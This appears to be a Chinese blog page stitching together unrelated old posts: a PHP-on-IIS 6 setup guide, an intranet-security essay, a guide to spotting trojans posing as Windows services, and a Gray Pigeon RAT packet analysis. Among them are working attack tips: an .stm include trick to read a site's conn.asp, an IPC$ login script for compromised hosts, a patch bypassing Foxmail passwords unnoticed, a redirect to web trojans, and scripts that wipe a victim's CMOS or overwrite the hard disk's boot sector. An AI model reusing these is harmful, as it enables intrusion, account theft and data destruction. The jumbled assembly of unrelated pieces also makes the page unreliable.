无涯知识屋

博思咨询-人生规划，心理咨询

专注于心理成功管理教育，提供人生规划心理成功管理创业方面咨询，为你排忧解难,让我们一起欣赏世界……

虽然 LAMP 组合很不错，但是如果想要架设一台同时支持PHP、ASP、ASP.NET、JSP、Perl的Web虚拟主机服务器，还是用 Windows 2003的IIS 6最好。网上有很多介绍在IIS 6上配置PHP的文章，但是那些方法不是性能不好，就是升级麻烦。下面的方法可以让你在第一次配置好后，能够非常方便的进行升级。 

　　这里所说的升级，是指从某个php4版本升级到另一个php4版本，或者从某个php5版本升级到另一个php5版本，而不是指从php4升级到php5。 

　　准备： 

　　1、一台安装好的 Windows 2003 服务器，并且已经安装了 IIS 6。 

　　2、下载 windows 版的 PHP 二进制压缩包 

　　安装： 

　　解压缩 PHP 二进制压缩包到 C:\php 目录下（这里假设 C: 盘是系统盘，即安装了Windows 系统的盘，如果系统盘是 D: 盘，则解压缩到 D:\php 目录下，以此类推，下同）。 

　　然后打开“我的电脑”->“属性”->“高级”->“环境变量”->“系统变量”->“path”，编辑其值，在前面增加下面的路径地址： 

　　C:\php;C:\php\dlls;C:\php\extensions;C:\php\sapi; 

　　将 php.ini-dist 或 php.ini-recommended 复制到 C:\Windows 目录下，并改名为 php.ini，一般正式发布网站的服务器用 php.ini-dist，而作为调试用的服务器用 php.ini-recommended 更好。当然一般情况下，这个 php.ini 还是需要根据实际情况来修改的。 

　　下面来介绍一下几个必要的修改选项： 

　　extension_dir = "C:\php\extensions" 

　　这个是 PHP 扩展所放置的目录，请确保跟你实际安装的目录相同。 

　　extension=php_mbstring.dll 

　　;extension=php_big_int.dll 

　　extension=php_bz2.dll 

　　extension=php_cpdf.dll 

　　extension=php_crack.dll 

　　extension=php_curl.dll 

　　extension=php_db.dll 

　　extension=php_dba.dll 

　　extension=php_dbase.dll 

　　extension=php_dbx.dll 

　　extension=php_domxml.dll 

　　;extension=php_exif.dll 

　　;extension=php_fdf.dll 

　　;extension=php_filepro.dll 

　　extension=php_gd2.dll 

　　extension=php_gettext.dll 

　　extension=php_hyperwave.dll 

　　extension=php_iconv.dll 

　　;extension=php_ifx.dll 

　　;extension=php_iisfunc.dll 

　　extension=php_imap.dll 

　　;extension=php_interbase.dll 

　　extension=php_java.dll 

　　extension=php_ldap.dll 

　　;extension=php_mcrypt.dll 

　　extension=php_mhash.dll 

　　extension=php_mime_magic.dll 

　　extension=php_ming.dll 

　　extension=php_mssql.dll 

　　extension=php_msql.dll 

　　;extension=php_oci8.dll 

　　extension=php_openssl.dll 

　　;extension=php_oracle.dll 

　　extension=php_pdf.dll 

　　extension=php_pgsql.dll 

　　;extension=php_printer.dll 

　　extension=php_shmop.dll 

　　;extension=php_snmp.dll 

　　extension=php_sockets.dll 

　　;extension=php_sybase_ct.dll 

　　extension=php_w32api.dll 

　　extension=php_xmlrpc.dll 

　　extension=php_xslt.dll 

　　extension=php_yaz.dll 

　　extension=php_zip.dll 

　　上面这些，开头没有加分号的是打开的扩展，加了分号的是没有打开的扩展。上面的设置包含了在 Windows 2003 上默认安装情况下可以打开所有扩展（这里列出的是 php 4 的）。 

session.save_path = c:\sessions

　　这个是 session 文件默认保存的目录，这个目录必须是一个存在的目录，不然默认的 session 功能会无效。我这里设置的是一个 ramdisk 上的一个目录。将 session.save_path 设置在 ramdisk 上可以加快 session 处理的速度。如果你没有安装 ramdisk，你可以把它指定到其他盘的任何一个目录下，如 C:\sessions 目录、C:\Windows\Temp 目录等。

　　OK，基本工作作完了，现在该配置 IIS 了。

　　打开“ Internet 信息服务(IIS)管理器”，在“ Web 服务扩展”里，选择“添加一个新的 Web 服务扩展”，扩展名可填写“PHP ISAPI 扩展”，要求的文件选择：C:\php\sapi\php4isapi.dll（如果安装的是 PHP5，则此处是 C:\php\sapi\php5isapi.dll，下同），并设置扩展状态为允许。

　　打开“网站”->“属性”->“ISAPI 筛选器”->“添加”，筛选器名称可填写“PHP”，可执行文件仍然选择 C:\php\sapi\php4isapi.dll。

　　打开“网站”->“属性”->“主目录”->“应用程序设置”->“配置”->“应用程序扩展”->“添加”，可执行文件还是选择 C:\php\sapi\php4isapi.dll。扩展名填写“.php”，动作限制为“HEAD,GET,POST”。

　　打开“网站”->“属性”->“文档”->“启用默认内容文档”->“添加”，可以将 index.php 添加为默认内容文档。

　　然后选择“服务器机器名”->“所有任务”->“重新启动 IIS”来重启 IIS。

　　测试

　　在默认网站发布目录下，建立一个测试页面：

　　下载：phptest.php

　　phpinfo();

　　?>

　　如果打开这个页面能够看到 php 安装配置信息，就算是安装成功了。

　　如果想要更优化的执行 php 程序，可以安装 ZendOptimizer-2.6.0-Windows-i386.exe ，这个东西安装非常简单，这里就不介绍了。

　　升级

　　现在升级就非常简单了。只需要将新版本的 PHP 二进制压缩包下载下来，将原来的 C:\php 目录删除，将新版本解压缩到 C:\php 目录中，然后重新启动一下 IIS 就可以了。不需要修改任何配置，也不需要往 System32 目录中复制任何文件。是不是很方便啊？

利用stm来上传，还能执行程序，代码：

说保存为stm或者shtml看看，运行如下:

HTTP_ACCEPT:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */* HTTP_ACCEPT_LANGUAGE:zh-cn HTTP_CONNECTION:Keep-Alive HTTP_HOST:localhost HTTP_USER_AGENT:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322) HTTP_COOKIE:nbblastactivity=1100263629; bblastvisit=1100264583; bblastactivity=1100265530; bbuserid=1; bbpassword=0f8514d1ed2eaa91fb9a87a568f6c96f; ASPSESSIONIDAQTSDRQQ=JOGDCEBDCNKFMLGDNFHPDHMJ HTTP_ACCEPT_ENCODING:gzip, deflate 当前文件名称:F:\Web\1.stm Web服务器的名称和版本:Microsoft-IIS/5.0 主机名:localhost 端口:80 客户或客户代理IP地址:127.0.0.1 客户或客户代理主机名:127.0.0.1 PATH_INFO 的值，但带有扩展为某个目录规范的虚拟路径:F:\Web\1.stm 客户端给出附加路径信息:/1.stm image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*

Quoted from Unkown:

当网站不允许上传asp cer cdx htr等文件时, 上传一个stm文件, 内容为: <!--#include file="conn.asp"--> 直接请求这个stm文件, conn.asp就一览无遗, 数据库路径也就到手啦!

原来就是如上所说的，
<!--#include file="conn.asp"-->
　　就是一条SSI指令，其作用是将"info.htm"的内容拷贝到当前的页面中，当访问者来浏览时，会看到其它HTML文档一样显示info.htm其中的内容。
我在本地试验成功！在我的iis目录下建了一个test.stm文件，内容为：

<!--#include file="ok.asp"-->

又在同一目录下放了一个我的一个木马文件ok.asp
在浏览器中请求test.stm，没有什么反映，一片空白。
但是一查看源代码，狂晕，原来就是我的asp文件的内容！
这样我们就可以利用这个来获取要入侵的web的conn文件来获得数据库路径，
但是一个前提是服务器的对stm或者shtml的扩展没有删除！

 掌握一些黑客知识是非常必要的，不是要攻击别人，而是通过简单的黑客知识掌握网络/系统安全技术，开拓思路，从而更好的保护自己的电脑。也就是所谓的"知己知彼百战不殆"。

    1.简化CMD下用IPC$登录肉鸡的操作

    用记事本建立一个名为login.bat文件，代码如下：

@net use $">\\%1\ipc$Content$nbsp;%3 /u:"%2"

@echo OK!连接已经建立成功！

    使用方法是在CMD下输入：login.bat肉鸡的IP肉鸡的ADMIN组的帐号名/用户的密码。这样我们以后用IPC$登录肉鸡就不用每次都输入一大串的命令了。

    2.进入Foxmail账户有妙招

    在Foxmail中可以为账户加上访问密码，如果没有密码却想进入别人的信箱该怎么办呢？一个众所周知的办法是：打开Foxmail文件夹下以账户名命名的任意一个文件夹，里边有个名为account.stg的文件，把它复制到你想进入的账户目录里，直接覆盖该目录下原来的account.stg文件。运行Foxmail，点击那个忘记了密码的账户，可以直接进入该信箱！但是上面的方法并不隐蔽，因为对方下次使用信箱时就会发现你破解了他的信箱，这样不够隐蔽。要想进入对方的信箱还不被对方发现，可以使用下面这个办法：用16进制文件编辑器UltraEdit打开Foxamil的主程序foxmail.exe文件，按组合键Alt＋F3查找以下的代码：E8617EE4FF7515，单击"确定"开始查找，找到后把其中的7515改为9090，其他代码不用改，然后保存就可以了。执行foxmail.exe，这样可以随意进入设有密码的Foxmail邮箱。该技巧对最新的Foxmail5.0.500.0有效。

    3.利用vbs脚本判断对方的IE版本

    我们在编制网页木马时，常常需要页面具有自动判别对方IE版本的能力，根据版本的不同，跳转到不同的网页木马页面。之所以这样做，是因为不同版本的IE，其木马网页的制作方法并不相同，比方说针对IE6.0版的网页木马制作方法与其下各个版本就不相同。

    打开记事本，输入如下内容：

〈SCRIPT language=vbscript〉

if Instr(window.navigator.appversion,"MSIE 6.0")>0 then

alert("浏 览 器：Internet Explorer 6.0")

window.location.href="http://IE6.0 网页木马页面"

else

alert("浏 览 器：6.0版本以下")

window.location.href="http://IE6.0 以下版网页木马页面"

end if

〈/SCRIPT〉

    这样，使用IE6.0的用户浏览了该页面后，会自动跳转到http://IE6.0网页木马页面，不是IE6.0的用户浏览后会自动跳转到http://IE6.0以下版网页木马页面。

4.肉鸡的ipc$打不开该怎么办

    有些朋友反映telnet到对方的机器后却不能打开ipc$，这该怎么办呢？我的做法是首先试试net share命令，看能不能使用，如果不能使用，说明对方没有安装文件和打印机共享服务，那ipc$一定是无法使用，此时只能放弃了。再输入net share ipc$试试，看看ipc$能不能打开，如果不行就输入net stop server，接下来再输入net start server，这样试试看ipc$能不能打开。如果net stop server不能执行，先把其附属进程关闭，再关server的主进程，一般到此ipc$多半可以连接上了。如果还是不行，那多半是对方有防火墙，这时只能想办法杀掉防火墙的进程了。

    5.用vbs脚本结束进程

    先声明这一招不是我自己想到的，是从高手ilovewen那里学来的。把下面的内容保存为.vbs脚本，在Windows2000下可以运行成功，代码内容如下：

On Error Resume Next

strComputer="."Set objWMIService = GetObject("winmgmts:" _

&& "!\\" && strComputer && "\root\cimv2")Set colProcessList

=objWMIService.ExecQuery _

("select * from Win32_Process where Name=’*.exe’")For Each objProcess in colProcessList

objProcess.Terminate()Next

其中*.exe是你要结束的进程，将它改为你要结束进程的名即可。

    6.利用批处理清除对方的CMOS内容

    如果你想清除对方的CMOS内容该怎么办？方法有很多了，利用批处理绝对是很另类的一招吧？请打开记事本，在文件中输入如下内容：

Const ForAppending=8

Dim fso,x,y

Set fso=createObject("Scripting.FileSystemObject")

Set x=fso.OpenTextFile("c:\autoexec.bat", ForAppending, True)

Set y=fso.createTextFile("c:\1.txt", True)

x.WriteBlankLines(1)

x.Write"debug<1.txt"

x.WriteBlankLines(1)

y.WriteLine("o 70 10")

y.WriteBlankLines(1)

y.Write("o 71 10")

y.Close

x.Close

    把上述内容保存为.bat文件，然后拷贝到对方的电脑上运行即可。它的作用是向Autoexec.bat中加入数据，创建一个文件，并向其中写入内容，在他下次开机时调用debug清除掉CMOS设置，包括CMOS密码。其实，这与大家常用的清除CMOS密码的方法很相象，通常情况下清除CMOS密码的方法是在DOS状态下输入debug，回车之后输入如下命令即可手工清除密码：

-o 70 10

-o 71 01

-q

    7.利用批处理轰炸对方电脑

    这是从一些高手那里学来的招数，呵呵，真是好方法。具体步骤是，打开记事本，在里面输入如下内容：

@echo 正在轰炸中……

:start

@net send %1 %2

@if errorlevel 1 goto over

goto start

:over

@echo 发送失败:(

    将其保存为任意名字的.bat文件即可。使用用法是：任意名字的.bat+空格+目标IP地址+空格+你要对他说的话

8.戏弄非法用户

    为防止有人胡乱使用自己的电脑，我们可以利用批处理文件来戏弄一下非法用户。方法是用记事本程序在Windows目录中建立一个Winstart.bat文件，并在该文件中加入以下命令：

@echo off

echo non-system disk or disk error

choice/c:&&/n

    上面代码中的"&&"为我们设置的密码，您可以自行设置。这样重新启动计算机开机时就会显示"non-system disk or disk error"，接着光标一闪一闪的好像死机了一样，造成非法用户以为Windows死机的假象。有时就连高手也会上当受骗！当我们要进入系统时，只要输入"&&"即可。

    9.破坏硬盘主引导扇区

    如果你有机会接触对方的电脑，无论是否是物理接触都可以，只要能在对方的电脑上运行下面这些代码，就可以破坏对方硬盘主引导扇区，象病毒一样厉害。方法是运行debug，然后输入：

a 100

mov ax,301

mov bx,1000

mov cx,1

mov dx,80

int 13

g=100 10e

    10.我的电脑你别用

    如果你不想让别人使用你的电脑，又不好意思说，那该怎么办呢？在CMOS中设密码，太小气了吧？他如果问你密码，你好意思不说吗？其实，我们可以用下面这个办法来欺骗一下他的眼睛，使他人以为电脑坏了。

    方法是：进入MS-DOS方式或CMD窗口下，输入：copy con null.sys，按一下回车键，然后什么也别输入，再按一次回车键，按Ctrl+Z或按F6键，屏幕上会显示^z，按一下回车键，屏幕上会显示"1 file(s) copied"，这样就一个名为null.sys的空文件就建好了。现在，找到C盘根目录下的config.sys文件，注意这个文件是隐藏属性，所以必须进入"我的电脑"中，点击"查看(v)"→"文件夹选项"→"查看"→"显示所有文件"才能看到它，然后右键单击该文件，在弹出菜单中选择"用记事本打开"，接下来在config.sys文件中加入：device=c:\null.sys /d:null这样一行，保存修改结果，退出记事本。以后，你的电脑就会在出现Windows的启动画面时自动重新启动，如此反复下去，别人一定以为你的电脑出问题了，而你就可以偷偷乐了。

几乎所有企业对于网络安全的重视程度一下子提高了，纷纷采购防火墙等设备希望堵住来自Internet的不安全因素。然而，Intranet内部的攻击和入侵却依然猖狂。事实证明，公司内部的不安全因素远比外部的危害更恐怖。

　　大多企业重视提高企业网的边界安全，暂且不提它们在这方面的投资多少，但是大多数企业网络的核心内网还是非常脆弱的。企业也对内部网络实施了相应保护措施，如：安装动辄数万甚至数十万的网络防火墙、入侵检测软件等，并希望以此实现内网与Internet的安全隔离，然而，情况并非如此！企业中经常会有人私自以Modem拨号方式、手机或无线网卡等方式上网，而这些机器通常又置于企业内网中，这种情况的存在给企业网络带来了巨大的潜在威胁，从某种意义来讲，企业耗费巨资配备的防火墙已失去意义。这种接入方式的存在，极有可能使得黑客绕过防火墙而在企业毫不知情的情况下侵入内部网络，从而造成敏感数据泄密、传播病毒等严重后果。实践证明，很多成功防范企业网边界安全的技术对保护企业内网却没有效用。于是网络维护者开始大规模致力于增强内网的防卫能力。

　　下面给出了应对企业内网安全挑战的10种策略。这10种策略即是内网的防御策略，同时也是一个提高大型企业网络安全的策略。

　　1、注意内网安全与网络边界安全的不同

　　内网安全的威胁不同于网络边界的威胁。网络边界安全技术防范来自Internet上的攻击，主要是防范来自公共的网络服务器如HTTP或SMTP的攻击。网络边界防范（如边界防火墙系统等）减小了资深黑客仅仅只需接入互联网、写程序就可访问企业网的几率。内网安全威胁主要源于企业内部。恶性的黑客攻击事件一般都会先控制局域网络内部的一台Server，然后以此为基地，对Internet上其他主机发起恶性攻击。因此，应在边界展开黑客防护措施，同时建立并加强内网防范策略。

　　2、限制VPN的访问

　　虚拟专用网（VPN）用户的访问对内网的安全造成了巨大的威胁。因为它们将弱化的桌面操作系统置于企业防火墙的防护之外。很明显VPN用户是可以访问企业内网的。因此要避免给每一位VPN用户访问内网的全部权限。这样可以利用登录控制权限列表来限制VPN用户的登录权限的级别，即只需赋予他们所需要的访问权限级别即可，如访问邮件服务器或其他可选择的网络资源的权限。

　　3、为合作企业网建立内网型的边界防护

　　合作企业网也是造成内网安全问题的一大原因。例如安全管理员虽然知道怎样利用实际技术来完固防火墙，保护MS-SQL，但是Slammer蠕虫仍能侵入内网，这就是因为企业给了他们的合作伙伴进入内部资源的访问权限。由此，既然不能控制合作者的网络安全策略和活动，那么就应该为每一个合作企业创建一个DMZ，并将他们所需要访问的资源放置在相应的DMZ中，不允许他们对内网其他资源的访问。

　　4、自动跟踪的安全策略

　　智能的自动执行实时跟踪的安全策略是有效地实现网络安全实践的关键。它带来了商业活动中一大改革，极大的超过了手动安全策略的功效。商业活动的现状需要企业利用一种自动检测方法来探测商业活动中的各种变更，因此，安全策略也必须与相适应。例如实时跟踪企业员工的雇佣和解雇、实时跟踪网络利用情况并记录与该计算机对话的文件服务器。总之，要做到确保每天的所有的活动都遵循安全策略

5、关掉无用的网络服务器

　　大型企业网可能同时支持四到五个服务器传送e－mail，有的企业网还会出现几十个其他服务器监视SMTP端口的情况。这些主机中很可能有潜在的邮件服务器的攻击点。因此要逐个中断网络服务器来进行审查。若一个程序（或程序中的逻辑单元）作为一个window文件服务器在运行但是又不具有文件服务器作用的，关掉该文件的共享协议。

　　6、首先保护重要资源

　　若一个内网上连了千万台（例如30000台）机子，那么要期望保持每一台主机都处于锁定状态和补丁状态是非常不现实的。大型企业网的安全考虑一般都有择优问题。这样，首先要对服务器做效益分析评估，然后对内网的每一台网络服务器进行检查、分类、修补和强化工作。必定找出重要的网络服务器（例如实时跟踪客户的服务器）并对他们进行限制管理。这样就能迅速准确地确定企业最重要的资产，并做好在内网的定位和权限限制工作。

　　7、建立可靠的无线访问

　　审查网络，为实现无线访问建立基础。排除无意义的无线访问点，确保无线网络访问的强制性和可利用性，并提供安全的无线访问接口。将访问点置于边界防火墙之外，并允许用户通过VPN技术进行访问。

　　8、建立安全过客访问

　　对于过客不必给予其公开访问内网的权限。许多安全技术人员执行的“内部无Internet访问”的策略，使得员工给客户一些非法的访问权限，导致了内网实时跟踪的困难。因此，须在边界防火墙之外建立过客访问网络块。

　　9、创建虚拟边界防护

　　主机是被攻击的主要对象。与其努力使所有主机不遭攻击（这是不可能的），还不如在如何使攻击者无法通过受攻击的主机来攻击内网方面努力。于是必须解决企业网络的使用和在企业经营范围建立虚拟边界防护这个问题。这样，如果一个市场用户的客户机被侵入了，攻击者也不会由此而进入到公司的R&D。因此要实现公司R&D与市场之间的访问权限控制。大家都知道怎样建立互联网与内网之间的边界防火墙防护，现在也应该意识到建立网上不同商业用户群之间的边界防护。

　　10、可靠的安全决策

　　网络用户也存在着安全隐患。有的用户或许对网络安全知识非常欠缺，例如不知道RADIUS和TACACS之间的不同，或不知道代理网关和分组过滤防火墙之间的不同等等，但是他们作为公司的合作者，也是网络的使用者。因此企业网就要让这些用户也容易使用，这样才能引导他们自动的响应网络安全策略。

　　另外，在技术上，采用安全交换机、重要数据的备份、使用代理网关、确保操作系统的安全、使用主机防护系统和入侵检测系统等等措施也不可缺少。

有些木马为了免遭杀毒软件的查杀，经常将自己摇身一变，扮成系统服务，让其随系统启动自动运行，不知不觉地长久控制你的机器。让我们以牙还牙，来驱赶险恶的“后门服务”。

　　小知识 什么是服务

　　服务是一种应用程序类型，它在后台运行。要管理系统服务，请运行services.msc，打开“服务”对话窗口，这里可以看到当前系统中的所有服务。双击某一服务，在弹出的“属性”对话框的“常规”选项页中的“服务状态”栏可以看到此服务当前状态。单击“启动类型”下拉菜单，可以将该服务设置为自动启动、手动启动或禁用。

　　有道是:知己知彼方能百战百胜，要想应付这类木马，就得知道它是如何变脸为服务，来长期潜伏作恶的。一般说来，根据木马变脸的方法不同，通常可以从两方面去做相应防范:

　　一、小心Windows成为木马的帮凶

　　Windows的“服务”工具是不能添加/删除服务的，但可以利用Windows提供的资源工具包中的Instsrv.exe和Srvany.exe来实现。其中，Instsrv.exe可以给系统安装和删除服务，Srvany.exe可以让程序以服务的方式运行。

　　★变脸原理

　　第一步:报户口——注册服务名称

　　这里就以建立一个名为explorer的服务为例来说明，首先将Instsrv.exe和Srvany.exe存放到一个比较方便的地方，建议放到系统安装目录中(笔者的Windows XP安装目录为D:\Windows)。运行cmd.exe，进入“命令提示符”窗口，执行命令:cd d:\Windows，进入系统安装目录。运行命令:

　　Instsrv explorer d:\Windows\srvany.exe

　　好了，这条命令的成功运行，已经在系统中注册了一个名叫explorer的服务，快到“服务”中看看一下检验检验吧!

　　小提示

　　★注册服务:instsrv :这里的可任意取名，前面必须带上该文件的绝对路径，如:D:\Windows\srvany.exe。

　　★删除服务:instsrv remove

　　第二步:找关联——后门服务

　　要让explorer服务正常运行，还必须在注册表中指定该服务对应的应用程序。运行Regedit.exe，打开“注册表编辑器”，依次展开如下子键:[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services]，在该子键下找到并右击explorer(对应前面建立的服务名)，选择“新建”下的“项”，将其命名为Parameters。单击选定它，在右侧窗口中新建一个名为Application的字符串值，将其数值数据设置为explorer服务对应的应用程序绝对路径，比如:d:\Windows\gboor.exe。接着再新建两个字符串值:AppDirectory和AppParameters，AppDirectory指定程序所在的目录，AppParameters指明程序运行的参数(注意:可以不用设值)，如图1所示，最后关闭注册表编辑器。

　　接下来打开“服务”窗口，找到刚添加的explorer服务，打开其属性对话框，单击切换到“登录”选项页，在“登录身份”中选中“本地系统账户”，如图2，如果不想让服务在运行的时候弹出状态窗口，请不要勾选“允许服务与桌面交互”复选项，单击“确定”返回。至此，explorer服务已经全部配置好了。

　　最后，右击该服务，选择“启动”，这样该程序就会启动，而且以后也会在系统启动时自动以服务形式运行!

　　小提示

　　也可以通过命令来启动服务:net start explorer。

　　★赶走“后门服务”没商量

　　弄清了木马变服务的伎俩，解决起来就不难了。如果发现系统出现异常，可以到“服务”窗口中进行查看，一旦发现这种恶意的“后门服务”，驱鬼的也仅仅是两步:①停止服务。所用的命令是:net stop 服务名称，例如:net stop explorer。②彻底删除伪服务，把这些险恶的“后门服务”赶出家门，命令为:instsrv.exe 服务名称 remove，例如:nstsrv.exe explorer remove。

　　二、小心木马变服务的始作俑者

　　有些木马利用一款名为AppToService的小软件来变服务。该软件可以将任何应用程序作为 NT系统的服务来运行，而且操作起来更简单。

　　★变脸原理

　　安装好AppToService V2.7后，直接双击运行桌面上的快捷方式AppToService，即可按相应的提示进行操作。

　　举个例子，如果想要把程序d:\Windows\gdoor.exe添加成服务，并将其“服务类型”设置为“自动”，只要运行命令:Apptoservice /install /absname:"bd" /startup:A "d:\Windows\gdoor.exe"，就可成功新建bd服务。启用服务的方法相同即net start bd。

　　★以牙还牙制服“后门服务”

　　如果发现一些木马借AppToService变脸为服务，可以运行如下命令来停止全部AppToService服务:AppToService /StopAll。接着再来删除它，要删除某一服务，请运行命令:AppToService /Remove 当前已存在的某个服务名称，比如:AppToService /remove bd，删除全部AppToService服务的命令为:AppToService /RemoveAll。

　　小提示

　　AppToService服务指的是所有通过AppToService添加的服务，不是指系统原有服务。

　　怎么样?知道了木马变服务的真实内幕了吧，相信有了上面的知识，再遇到后门服务，应该是手到擒来了吧!

　　声明:本文分析木马变服务过程，仅为了找出相应的防范办法。切勿模仿!

　现在很多家庭用户都通过电信的ADSL或其他公司提供的类似类型的宽带上网。由于宽带的费用并低廉，而对于大多数没有大量数据下载的家庭用户来说，一户人或一台电脑独占一条ADSL有点浪费资源的感觉。于是现在很多人都用共享一条宽带上网。　

　　这种共享上网的方法一般如下：电话线--语音分离器--ADSL猫--宽带路由器--交换机　集线器--电脑

　　在这种情况下，我经过思考与试验，我发现可以通过对宽带路由器进行适当设置就可以对上网进行限制。　

　　这里以TP-LINK TL-R402M为例（因为我发现最多人用这种。。。）说说限制上网的步骤。　

　　1.取得局域网内所有使用者的IP与MAC地址.　

　　取得IP的方法很多,推荐用"局域网查看工具",网上随便搜索一下就有了. 　

　　取得MAC地址的方法:WIN+R,输入CMD,用"NBTSTAT -A IP地址" 查看　

　　取得自己电脑IP与MAC的方法:WIN+R,输入CMD,用"IPCONFIG /ALL" 查看　

　　2.登陆宽带路由器　　

　　打开IE，输入192.168.1.1(一般都是这个....),就会出现登陆窗口　

　　账号：ADMIN　

　　密码：ADMIN(默认是这个，一般不更改滴...如果被更改了,稍候我研究下怎样破解,有进展再发帖)　
　　登陆后会出现宽带路由器的设置页面

首先要介绍一下软件
1.netlimiter 2 pro＝＝＝主要的作用是查看每个进程的连接。。可以看到进程开启的端口。与外界相连接时的本地和远端的端口。当然还可以限制流量。。关闭指定的线程等。。具体就大家去开发了。。
2.Iris＝＝＝＝＝＝＝＝＝相信你上网去google一下就知道这是很出名的嗅探器。。作用就不用说了。。就是抓包。。
3.iceSword冰刃＝＝＝＝＝别告诉我你没有这款经典的工具。。我主要用它来看查隐藏的进程。文件。。注册表项。
4.灰鸽子 [Version 2.03]＝＝＝＝这个就不多说了。

先看一下。。没中招前的服务。。相信大家都是用2000以上的系统了吧。。所以关于在98下面不以服务启动的鸽子就不讨论了。。
服务1.gif
空间。。更改他的ip.txt 文件。。让对方的鸽子飞到你这里来。。呵呵。。就看你的本事有多大了。。

做这个分析用了我两个晚上。。原因没别的。。昨天晚上。。单就找一个合用的iris就找了老半天。以前我也下载过。但是在连接上网络的情况下面就是注册不了。。。好不容易。。问网友：凌三少。。发了个3.7版的过来。。凑合着用。。但旧版的包解码。不及4.07的详细。。。搞来搞去在黑基软件中找到了也是4.07的。。不过。。是带注册机了。。看了上面的说明。。才明白我一直装不上。。原来是网络更新作的怪吧。。好了。。不多说了。。大家如果有兴趣自己去研究一下。。我分析的那32个数据包。。我也打包上来了。。方便大家用iris对照着来学习。。这个分析个人觉得还不错。。不但分析出了放鸽子的一些重要资料。。也让大家对tcp/ip协议的工作原理有个较清晰的了解。。

by the way。。我原本是想用iris分析出鸽子的连接密码的。。但是实际分析中。。却没抓到本机的服务端与本机的客户端的连接。。怪我功力不够。。最后也想请教一下高手：如何让隐藏的进程现身。。我的意思是让它变成普通的进程。。以方便用嗅探类的软件去分析它。。这个问题我事前也google过了。。没收获。。在有问必答里也发了贴。。希望大家都来关注一下这个问题。。谢谢

发表了才发现自己没有上传附件的权限。。晕哦。。
那些包我就抓图吧。。

进程端口2.gif

然后再配置一个鸽子的服务端。。由于是测试用的。。里面的服务名称我就不作调整了。。

我是用较多人用的那个上线方法：FTP上线,,客户的ip在这个文件上面/UpLoadFiles/NewsPhoto/>服务端的配置3.gif

然后我就运行服务端

这时在iceSword中就会看到iexplore.exe是一个红色的。。就表示是隐藏的进程了。。
中鸽子后的进程4.gif

中鸽子后的服务5.gif

本机的ip是 218.13.52.26
我的ip反向所在地址为：219.136.252.180
d:\hacker\ipc>ping free.6to23.com

Pinging cache014.6to23.net [219.136.252.180] with 32 bytes of data:

Reply from 219.136.252.180: bytes=32 time=18ms TTL=119
Reply from 219.136.252.180: bytes=32 time=15ms TTL=119
Reply from 219.136.252.180: bytes=32 time=15ms TTL=119

下面就分析一下抓到的数据包
首先看到的是著名的TCP协议的三次握手。
1.218.13.52.26：1708＝》61.151.241.97：80，FLage:S
先由本机(218.13.52.26)从1708端口向对方(61.151.241.91)的80端口发包，syn=1表示发起一个连接，生成随机seq
2.61.151.241.97：80＝》218.13.52.26：1708，FLage:AS
对方收到后将seq+1置于Ack发回给本机。并且syn=1,ACK=1表示对前者的确认，生成随机seq发回本机
3.218.13.52.26：1708＝》61.151.241.97：80，FLage:A
本机收到后将seq+1置于Ack发回给对方，将对方Ack置于Seq

这样就完成了三次握手。

下面就进行数据的传送了
4.218.13.52.26：1708＝》61.151.241.97：80，FLage:AP
本机向对方确认，并且PSH=1(PSH 置1时请求的数据段在接收方得到后就可直接送到应用程序，而不必等到缓冲区满时才传送。 )。这个我理解为本机向远程请求数据。
5.61.151.241.97：80＝》218.13.52.26：1708，FLage:A
远程向本机传送数据
6.61.151.241.97：80＝》218.13.52.26：1708，FLage:A
远程向本机传送数据

"建立一个连接需要三次握手，而终止一个连接要经过4次握手。这是因为一个TCP连接是全双工（即数据在两个方向上能同时传递），每个方向必须单独地进行关闭。4次握手实际上就是双方单独关闭的过程。 "


7.218.13.52.26：1708＝》61.151.241.97：80，FLage:A
本机对5.6发过来的数据的确认。
4～7均为数据包的传送。我理解为一直在传送同一个文件的不同大小的包。

要注意的是它们的seq与ack一直在存在seq+数据包大小=ack的关系。。


（TCP提供一种面向连接的、可靠的字节流服务。当接收端收到来自发送端的信息时，接受端要发送一条应答信息，表示收到此信息。数据传送时被TCP分割成认为最适合发送的数据块。一般以太网在传送时TCP将数据分为1460字节。也就是说数据在发送方被分成一块一块的发送，接受端收到这些数据后再将它们组合在一起。

例如：6的seq=3222831523,size=1502,=>7的ack=3222831523+1502-62=(14mac头+20ip头+20tcp头+8PPPoe头)
6行显示对方给本机发送了大小为1502字节大小的数据，注意我们前文讲过数据发送时是层层加协议头的，1502字节=14字节以太网头 + 8字节PPPoe头(因为我是电信宽带上网的) + 20字节IP头 + 20字节TCP头 + 1440字节数据

7行显示的应答信号ACK为：32222832963，这个数是6行得SEQ序号3222831523加上传送的数据1440，本机将这个应答信号发给对方说明已收到发来的数据(1440)。

"建立一个连接需要三次握手，而终止一个连接要经过4次握手。这是因为一个TCP连接是全双工（即数据在两个方向上能同时传递），每个方向必须单独地进行关闭。4次握手实际上就是双方单独关闭的过程。 "

8.61.151.241.97：80＝》218.13.52.26：1708，FLage:APF
对方发完最后一个数据包size=1078,并向本机请求终止，Fin=1(FIN 置1时表示发端完成发送任务。用来释放连接，表明发送方已经没有数据发送了。 )

9.218.13.52.26：1708＝》61.151.241.97：80，FLage:A
本机收到本机的fin=1后。。将seq+1=ack,回复本机，发回一个确认，并将应答信号ack设置为收到序号seq加1，这样就终止了对方=>本机这个方向的传输。

10.218.13.52.26：1708＝》61.151.241.97：80，FLage:AF
本机向对方请求终止，Fin=1(FIN 置1时表示发端完成发送任务。用来释放连接，表明发送方已经没有数据发送了。 )
11.61.151.241.97：80＝》218.13.52.26：1708，FLage:A
对方收到本机的fin=1后。。将seq+1=ack,回复本机，发回一个确认，并将应答信号ack设置为收到序号seq加1，这样就终止了本机=>对方这个方向的传输。

12~14三握手（s=>as=>a）
15~16数据传送
17~20四次握手（af=>a=>af=>a）

21~23我用鸽子Ftp更新了我的ip

24~26三次握手（s=>as=>a）

27注意。。这里就是重点了。鸽子读取ip.txt文件。。是明文的。。很容易就看到了：
GET /alex0008/tmp/ip.txt HTTP/1.0..User-Agent: MYURL..Host: free.6to23.com..Pragma

